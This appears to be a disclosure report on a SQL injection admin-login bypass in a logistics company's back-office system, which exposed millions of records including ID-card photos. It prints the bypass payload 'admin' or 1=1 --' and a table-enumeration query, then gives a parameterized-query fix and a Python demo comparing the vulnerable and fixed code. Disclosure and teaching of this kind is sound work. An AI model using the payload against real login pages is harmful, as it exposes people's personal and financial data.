
Admin login bypass / SQL injection in a 飞特物流 (Flyt Logistics) back-office system (tens of millions of user records / waybills / bank card numbers / ID-card photos)

16-07-18

Admin login bypass / SQL injection

http://**.**.**.**/manage/admin.aspx

Entering admin' causes an error.

The login can be bypassed (using an older IE, e.g. IE6).

Username:

admin' or 1=1 --

Password: anything

This location is also SQL-injectable.

13 databases

430 tables

Tens of millions of records

web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2012

SELECT a.name, b.rows FROM sysobjects AS a INNER JOIN sysindexes AS b ON a.id = b.id WHERE (a.type = 'u') AND (b.indid IN (0, 1)) ORDER BY b.rows DESC [407]:


A large number of ID-card images

One field in these records stores the user's ID-card photo.

UserAmazonAccount table

Remediation:

Use parameterized queries; the login logic on the login page has to be rewritten.
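Added example (not from the original report): a Python/sqlite3 stand-in for the credential lookup behind the login page, showing the string-concatenated query that the report's input admin' breaks and admin' or 1=1 -- bypasses, beside the parameterized form the remediation calls for. The table, column and credential values are constructed; in the real ASP.NET code the parameterized form corresponds to a SqlCommand carrying SqlParameter objects instead of a concatenated string.

```python
import sqlite3


def make_db():
    # Constructed in-memory stand-in for the admin table (assumed shape:
    # one username/password row per administrator).
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE admins (username TEXT, password TEXT)")
    conn.execute("INSERT INTO admins VALUES ('admin', 's3cret-constructed')")
    return conn


def login_concatenated(conn, username, password):
    # Vulnerable form: user input is spliced into the SQL text. The quote in
    # the username closes the string literal, "or 1=1" makes the WHERE clause
    # true for every row, and "--" comments out the password check.
    sql = ("SELECT COUNT(*) FROM admins WHERE username = '%s' AND password = '%s'"
           % (username, password))
    return conn.execute(sql).fetchone()[0] > 0


def login_parameterized(conn, username, password):
    # Hardened form: placeholders only; the driver passes the values
    # separately, so the quote and "--" are just characters in the compared
    # string and can never change the query's structure.
    sql = "SELECT COUNT(*) FROM admins WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchone()[0] > 0


def raises_sql_error(conn, username, password="x"):
    # Reproduces the first symptom in the report: a lone quote (admin')
    # leaves the concatenated query with an unterminated string, so the
    # database throws a syntax error instead of answering.
    try:
        login_concatenated(conn, username, password)
        return False
    except sqlite3.OperationalError:
        return True


if __name__ == "__main__":
    db = make_db()
    payload = "admin' or 1=1 --"
    print("concatenated query, bypass payload:", login_concatenated(db, payload, "anything"))
    print("parameterized query, bypass payload:", login_parameterized(db, payload, "anything"))
    print("concatenated query, admin' errors:", raises_sql_error(db, "admin'"))
```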
